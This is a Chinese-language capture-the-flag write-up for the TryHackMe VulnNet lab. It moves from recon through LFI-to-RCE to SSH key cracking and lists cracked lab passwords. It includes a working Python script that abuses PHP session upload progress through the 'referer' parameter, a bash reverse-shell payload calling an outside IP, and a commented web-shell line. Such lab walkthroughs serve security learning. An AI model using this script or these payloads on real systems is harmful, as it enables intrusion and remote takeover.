[Day17] THM VulnNet1

URL : https://tryhackme.com/room/vulnnet1
IP : 10.10.86.144
题目叙述 : You will have to add a machine IP with domain vulnnet.thm to your /etc/hosts

Recon

扫 Port
- rustscan -a 10.10.86.144 -r 1-65535
- nmap -A -p22,80 10.10.86.144
扫目录
- python3 dirsearch.py -u http://10.10.86.144/
发现登入页面
- 戳了常见的 SQL injection 都不行
观察网页连结
- - 透过 js formatter 自动进行格式化
- - 可以看到一个网址 broadcast.vulnnet.thm
    - 加到 /etc/hosts 指向同一个 IP
访问 broadcast.vulnnet.thm
- 发现需要登入

LFI 2 RCE

观察首页 referer 参数
- 发现可以 LFI
- 用 Session upload progress 大法就可以 RCE 了!!

import grequests
sess_name = 'meowmeow'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
base_url = 'http://vulnnet.thm/index.php'
param = "referer"

#code = "file_put_contents('/tmp/shell.php','<?php system($_GET[a])');"
code = '''system("bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'");'''

while True:
    req = [grequests.post(base_url,
                            files={'f': "A"*0xffff},
                            data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:<?php {code} ?>"},
                            cookies={'PHPSESSID': sess_name}),
            grequests.get(f"{base_url}?{param}={sess_path}")]

    result = grequests.map(req)
    if "pwned" in result[1].text:
        print(result[1].text)
        break

然後就 RCE 了
- (感觉就不是正规解...ㄏㄏ)

提权

先用豌豆扫描一次
- - 发现一个 Cronjob
- 找到 backup
观察 backup 档案，发现有 ssh-backup
- 先偷出来再说
解压缩
- 发现是 id_rsa
到家目录看使用者名称
- 发现使用者是 server-management

SSH 登入

准备 ssh 登入
- 发现 id_rsa 需要密码 QQ
用约翰爆破
- python3 ../../ssh2john.py id_rsa > id_rsa_john
- 密码是 oneTWO3gOyac
SSH 登入
- 取得 user flag
跑豌豆扫到 .htpasswd 密码的 hash
- 猜测应该是给 broadcast.vulnnet.thm 用的
- 用约翰爆破个
  - 密码是 9972761drmfsls
- 猜测原始思路正规解法应该是，前面 LFI 到这个档案然後取得密码後来做进一步的动作
访问 broadcast.vulnnet.thm
- 使用帐号 developers
- 密码 9972761drmfsls
- - 推测这应该是某个有 RCE 洞的 CMS